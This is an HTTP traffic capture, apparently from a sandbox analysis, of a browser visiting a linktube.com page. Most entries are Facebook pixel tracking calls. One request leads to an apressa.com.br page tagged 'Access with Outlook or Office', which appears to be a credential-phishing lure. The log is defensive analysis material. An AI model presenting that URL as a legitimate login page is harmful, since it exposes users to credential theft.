Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/me HTTP/1.1Host: linktube.comConnection: keep-alivesec-ch-ua-platform: "Windows"X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/jsonsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://linktube.com/ssfuelsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: auth.strategy=local; auth._token.local=false; auth._refresh_token.local=false
Source: global trafficHTTP traffic detected: GET /sdk/get_info HTTP/1.1Host: api.factors.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/209431097234591?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sdk/get_info HTTP/1.1Host: api.factors.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/370162274269334?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018861936&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018861936&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: trigger, event-source=navigation-sourceAttribution-Reporting-Support: webSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018861936&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018862579&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/138748961041622?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018862579&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: event-source=navigation-source, triggerAttribution-Reporting-Support: not-os, webSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=209431097234591&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018861936&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018862579&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=370162274269334&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018862579&sw=1280&sh=1024&v=2.9.190&r=stable&a=tmgoogletagmanager&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/432952554585575?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132%2C138%2C130 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/692479261420616?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132%2C138%2C130 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864706&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864706&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: trigger;navigation-source, event-sourceAttribution-Reporting-Support: web, not-osSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864707&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /offc/scg.html?utm_medium=social&utm_source=&utm_campaign=Access+with+Outlook+or+Office HTTP/1.1Host: apressa.com.brConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864707&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: trigger;navigation-source, event-sourceAttribution-Reporting-Support: not-os, webSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=432952554585575&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864707&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&it=1743018861152&coo=false&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=692479261420616&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864710&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://linktube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864706&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&exp=k2&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=138748961041622&ev=PageView&dl=https%3A%2F%2Flinktube.com%2Fssfuels&rl=&if=false&ts=1743018864706&sw=1280&sh=1024&v=2.9.190&r=stable&ec=0&o=12318&fbp=fb.1.1743018861934.367737420634560964&ler=empty&cdl=API_unavailable&cs_est=true&it=1743018861152&coo=false&exp=k2&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
